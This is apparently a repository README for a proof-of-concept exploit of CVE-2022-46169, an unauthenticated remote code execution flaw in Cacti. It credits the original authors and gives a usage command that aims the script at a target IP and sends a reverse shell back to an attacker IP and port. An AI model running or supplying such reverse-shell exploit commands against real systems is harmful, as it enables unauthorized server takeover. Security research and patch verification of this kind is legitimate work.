This repository contains a Proof of Concept (PoC) for CVE-2022-46169 - Unauthenticated RCE on Cacti <= 1.2.22. You can read more about the vulnerability here. The script adds a reverse shell handler and is based on the code written by sAsPeCt488. You can view the original code here.

python3 CVE-2022-46169.py -t 10.129.211.250 -i 10.10.14.72 -p 4444

Arguments:
-t : Target IP address 
-i : Attacker system IP Address
-p : Port for reverse shell

• Steven Seeley (mr_me) for discovering the exploit